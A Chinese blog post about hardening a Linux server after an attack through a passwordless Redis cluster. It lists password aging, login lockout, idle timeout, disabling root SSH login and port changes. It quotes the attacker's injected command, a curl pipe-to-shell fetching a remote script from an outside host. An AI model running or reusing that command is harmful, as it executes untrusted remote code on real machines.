安装完Linux需要做的关于安全的事

故事是这样子的

最近主机受到攻击，原因可能是redis集群没有设置密码（因为快过期了，不想搞得太复杂就没设），然后被人家搞事情了，就被人一把set了些执行脚本，形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥琐啊，我登上主机一看，简直是猥琐至极，不能忍了啊。

/ataola/github  ssh root@xx.xxx.xxx.xxx
root@xx.xxx.xxx.xxx's password:
Last failed login: Sat Jul 11 09:52:04 CST 2020 from 182.61.37.35 on ssh:notty
There were 206 failed login attempts since the last successful login.
Last login: Fri Jul 10 16:42:01 2020 from 122.224.125.196
 root@ataola  ~ 

以下是我做的一些努力，分享一下。

Linux账户口令生存期策略

口令老化（Password aging）是一种增强的系统口令生命期认证机制，能够确保用户的口令定期更换，提高系统安全性。

我们可以这样子做，把密码设置成三个月过期，具体的操作步骤如下：

# 打开etc目录下的login.defs
vim /etc/login.defs
# 添加楼下内容
PASS_MAX_DAYS 90

Linux账户登录失败锁定策略

设置账户登录失败锁定策略，加大用户口令被暴力破解的难度。

我们可以这样子做，只要是对面那位连续输错5次密码，我们就给它关小黑屋5分钟。，具体的操作步骤如下：

# 打开etc目录下的pam.d下的password-auth文件
vim /etc/pam.d/password-auth
# 添加楼下内容
auth required pam_tally2.so deny=5 unlock_time=300 even_deny_root root_unlock_time=300
account required pam_tally2.so

Linux账户超时自动登出策略

配置帐户超时自动登出，在用户输入空闲一段时间后自动断开。

具体操作如下：

# 打开/etc/profile
vim /etc/profile
# 输入楼下内容
export TMOUT=180

限制root用户远程登录策略

限制root权限远程登录。先以普通权限用户远程登录后，再切换到超级管理员权限账号后执行相应操作，可以提升系统安全性。

具体操作如下：

# 打开/etc/ssh/sshd_config
vim /etc/ssh/sshd_config
# 添加楼下内容
PermitRootLogin no
# 重启sshd服务

更改ssh监听端口

SSH监听在默认的22端口容易受到暴力破解攻击，修改为非默认端口可以提高系统的安全性

具体操作是修改/etc/ssh/sshd_config配置文件中的端口字段配置（Port字段），并重启服务

终极大招

封ip吧。。。。。。

本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。